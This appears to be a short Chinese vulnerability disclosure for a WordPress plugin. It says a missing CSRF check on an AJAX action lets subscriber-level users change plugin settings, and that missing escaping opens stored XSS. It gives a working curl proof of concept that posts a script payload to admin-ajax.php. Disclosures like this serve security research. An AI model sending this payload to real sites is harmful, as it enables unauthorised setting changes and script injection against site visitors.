在由于没有对导步AJAX执行进行CSRF验证导致验证用户,如subscriber也可以随意更新插件配置,而由于缺少特殊字符的转义和过滤,由此
导致了XSS的漏洞,POC如下
curl ‘http://example.com/wp-admin/admin-ajax.php’ –data ‘action=as_edit_pins_page&post_title=<script>alert(String.fromCharCode(88,83,83))</script>&post_id=9’
PS:这个ID 9 必需是存在的